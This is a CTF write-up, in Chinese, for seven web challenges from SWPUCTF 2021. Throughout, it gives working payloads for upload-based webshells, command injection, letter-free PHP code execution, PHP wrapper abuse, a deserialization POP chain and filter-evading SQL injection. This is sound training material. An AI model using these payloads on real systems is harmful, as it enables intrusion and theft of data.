[SWPUCTF 2021 新生赛] 第三波放题

[SWPUCTF 2021 新生赛]easyupload3.0

首先弄个报错出来，随便弄一下，比如弄出一个not found页面，发现是Apache/2.4.7 (Ubuntu) ，既然是 Apache，于是就利用.htaccess来getshell。

建一个.htaccess 文件，里面的内容如下：

SetHandler application/x-httpd-php

这样的话对文件名包含“123.jpg”字符串的文件进行解析.

先上传.htaccess文件，之后再上传123.jpg的一句话木马，蚁剑连接。

 得到flag。

[SWPUCTF 2021 新生赛]finalrce

|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

代码审计：一

点思路都没有。看别人题解是用到了linux里的tee命令。

exec这个函数是可以进行一个命令的执行，细心一点话，是可以看到的，虽然题目的本身是过滤了很多东西，可以看到的是没有过滤|这个符号，然后exec执行是没有回显的，这个题目是需要用linux的一个命令，”tee“将想要执行的命令写入到一个文件里面，然后再去访问这个文件，以此来执行这个命令。

传入 command | tee file.txt。

?url=l\s / | tee 1.txt  之后访问我们传入的文件1.txt，发现命令被执行。看见flllllaaaaaaggggggg

tac是没有被过滤的。再传入 ?url=tac /flllll\aaaaaaggggggg | 2.txt

访问2.txt。

得到flag。

[SWPUCTF 2021 新生赛]hardrce

','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦！");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦！");
}
echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";
eval($wllm);
}
else
{
    echo "蔡总说：注意审题！！！";
}
?>

要绕过黑名单和正则匹配的过滤字母，

可查看此博客无字母数字绕过正则表达式总结（含上传临时文件、异或、或、取反、自增脚本）_yu22x的博客-CSDN博客

过滤之后我们传入的会eval()变成命令来执行。

首先要传入system(ls /); 

即?wllm=~(~%8C%86%8C%8B%9A%92)(~%93%8c%df%d0);

再传入 tac flllllaaaaaaggggggg 。

?wllm=~(~%8C%86%8C%8B%9A%92)(~%8b%9e%9c%df%d0%99%93%93%93%93%93%9e%9e%9e%9e%9e%9e%98%98%98%98%98%98%98);

得到flag。

[SWPUCTF 2021 新生赛]PseudoProtocols

 题目url里有一个参数wllm让传递，并说让我们找到hint.php。用php伪协议filter协议读取一下hint.php的内容。

?wllm=php://filter/read=convert.base64-encode/resource=hint.php

访问/test2222222222222.php。

a参数利用file_get_contents()函数只读形式打开，打开后内容要与"I want flag"字符串相匹配，才能执行下面的文件包含$file参数。
看到用的是file_get_contents()函数打开text参数，以及后面的文件包含函数，自然的想到php伪协议中的data://协议。

构造?a=data://text/plain;base64,SSB3YW50IGZsYWc= 。得到flag。

 

[SWPUCTF 2021 新生赛]pop

admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?

构造pop链。

w00m;
    }
}
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));

?>

 将输出传入参数w00m里，得到flag。

[SWPUCTF 2021 新生赛]sql 

通过传入?wllm=1 %23发现过滤了空格。用/**/绕过。查得字段数为3.

再查询时可以发现，=也被过滤。用like绕过。

构造payload：?wllm=-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23

获取表名

 and 也被过滤了，所以把table_schema换成table_name来获取字段名

构造payload：?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23

获取字段名

再次构造payload ：?wllm=-1'union/**/select/**/1,group_concat(id,flag),3/**/from/**/LTLT_flag%23

得到flag。

 不过发现flag是不完整的。禁了right函数，看别人题解是用的mid函数截取字符串.

构造:

?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),1,20),3/**/from/**/LTLT_flag%23

?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),21,40),3/**/from/**/LTLT_flag%23

?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),41,60),3/**/from/**/LTLT_flag%23

 [SWPUCTF 2021 新生赛]hardrce_3

 这两道hardrce题借鉴yu师傅的博客无字母数字绕过正则表达式总结（含上传临时文件、异或、或、取反、自增脚本）_yu22x的博客-CSDN博客

 与上道hard_rce相比，这道题不让使用~，|，^和空格了。

所以这个题用yu师傅的自增那个。

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

这是固定格式构造出来的 assert($_POST[_]);

然后post传入 _=phpinfo();

使用时需要url编码.

%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b'!'%3d%3d'%40'%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d'_'%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b

 

发现system,exec,shell_exec,popen,proc_open,passthru被禁用 .

但是可以用file_put_contents(,)

file_put_contents函数 第一个参数是文件名，第二个参数是内容。

所以 构造: _=file_put_contents("1.php","");传入

然后访问/1.php，密码shell连接。